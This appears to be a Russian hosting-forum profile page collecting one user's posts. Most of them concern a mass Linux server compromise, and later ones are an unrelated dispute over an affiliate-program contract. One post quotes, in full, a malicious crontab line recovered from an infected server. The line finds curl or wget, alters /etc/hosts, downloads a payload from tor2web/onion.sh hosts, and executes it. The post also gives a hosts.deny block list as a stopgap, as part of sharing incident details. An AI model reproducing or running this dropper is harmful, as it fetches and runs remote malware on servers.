smart2web

Рейтинг
307
Регистрация
30.12.2015

Один сервер клиенту вычистил. Алгоритм действий понятен теперь хотя бы.

LEOnidUKG:
Что значит массово поломали? Какая ОС и ядро стояло? И где про массовость почитать?

Судя по всему через уязвимость https://www.opennet.ru/opennews/art.shtml?num=50819

А заливают это https://vms.drweb.ru/virus/?i=17756667&lng=ru

но что-то модифицированное.

Что значит массово поломали

У троих хостеров уже знаю таких клиентов с жалобами на нестабильную работу сервера клиента. По проверке - сидит малварь. Поэтому и массово.

~# crontab -l
*/9 * * * * tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /.cache/.ntp) && chmod +x /.cache/.ntp && /bin/sh /.cache/.ntp
lealhost:
Есть информация по этому поводу?

Пока только как временное решение > /etc/hosts.deny

ALL : .tor2web.io

ALL : .onion.sh

ALL : .tor2web.su

ALL : tor2web.sh

ибо остальное все малваря переписывает и атрибуты ставит.

Смотрите crontab -l Там гадость сидит.

сегодня массово поломали линуксы. Пока не удалось найти решение.

/dev/sda2 input/output error, сервер не стартует

Хотя наверное это не тот случай.

bruder, изначально ТС не партнер и не может быть таковым по условиям партнерской программы. Точка!

Я вам буду это повторять пока вы это не поймете. Все остальное просто не имеет смысла. Вы хоть тысячу законов найдите, но они не будут никоим образом относится к данной ситуации.

bruder:
Они прописаны в разделе 3. Обязанности сторон

Обязанности для партнеров. ТС не партнер. Поэтому и договор читать не имеет смысла. Он не был заключен.

---------- Добавлено 13.05.2019 в 09:46 ----------

bruder:
На основании чего они "присвоили ему статус партнера, дали рефкод и рекламные материалы, принимали его рефов, начисляли на его имя долю платежей"?

Ну я вам щас накидаю каких-то кодов и обьявлю английской королевой. Будете ли вы таковой? Нет. Не отвлекайтесь от сути. А суть тут такова. Что изначально ТС не партнер и не может быть таковым по условиям партнерской программы. Остальное просто не имеет смысла т.к. относится к партнерам.

---------- Добавлено 13.05.2019 в 09:49 ----------

bruder:
Но это все неважно, потому что

Это ваше потому, что и есть не важно. т.к. это все описывает уже заключенный договор. А он по сути не мог быть заключен т.к. не заключается с сторонними лицами не являющимися клиентами компании. Что бы стать клиентом, надо приобрести услугу описанных в договоре тарифов. И лишь тогда есть возможность заключить договор ПП. Точнее немного не так. Оферту конечно может принять любой и по сути акцептирование оферты и есть заключение договора. Но тут же сразу идет условие. Которое не выполняется. Ну это как мы с вами договорились, что вы мне камаз серверов привезете, а прихал пустой камаз и вы требуете денег, аргументируя тем, что камаз же приехал. А про сервера упустим. Я же выполнил договор частично.

bruder:
SHOROOP, ГК РФ Статья 450. Основания изменения и расторжения договора

smart2web, они присвоили ему статус партнера, дали рефкод и рекламные материалы, принимали его рефов, начисляли на его имя долю платежей - все это делалось на основании договора. Оферты, но это тоже договор.

Это делает биллинг автоматически без участия человека. Именно поэтому существует такой вид договора, как оферта. И именно поэтому там описаны определенные условия. (можно прочесть только выделенное)Если их не соблюсти, то и договор не заключается. Это же так просто к пониманию. Юридически ТС не был партнером и все те фантики насчитанные в биллинге в деньги не конвертируются и выплат он не получит. Вы так яро топите за один пункт договора, но упорно игнорируете другой. Есть четкие условия, которые не были не соблюдены. О чем может идти речь?

bruder:
Выплаты происходят не какому-то аккаунту, а человеку/компании, с которым заключен партнерский договор. Бегет нарушает условия этого договора, аннулировав выплаты.

Договор не был заключен. ТС не выполнил условия заключения договора. Не путайте. Договор заключается с владельцем аккаунта с определенными тарифами. У ТС их нет. Ну как вы этого не поймете.

bruder:
сгорание рефов, если партнер не платит за хостинг.

Но там сказано, что такой аккаунт не является партнерским и на нем априори не может быть выплат. Что должно сгореть если аккаунт не партнерский по договору и лишь только ТС его считает таковым? Я вот считаю, что вы мне 100к должны. Мы об этом не договаривались? Ну и что. Я же так считаю. Я там вам на сайт привел миллион посетителей. Могу табличку в exel показать. Куда кошелек скидывать?

qpPeW:
Извините, но это самый тупой вопрос который может возникнут у полоумного человека.
По вашему все кто работают в BMW должны ездить на BMW или же те кто работает в магазине Xiaomi должны пользоваться техникой Xiaomi ?
Логика на уровне плинтуса, а может еще и ниже, хотя бы потому что когда работник пользуется услугой или вещью своей компании (в которой он работает), то он покупает её за специальной ценой (в большинстве компаний имеются пункты в контакте по этому поводу).
Так что это не более чем бред сумасшедшего и полоумности руководства компании, потому что ни один нормальный руководитель не пропустит подобные правила к публикации и тем более к применению.

https://www.bbc.com/russian/russia/2009/06/090618_bmw_loyalty

Всего: 3501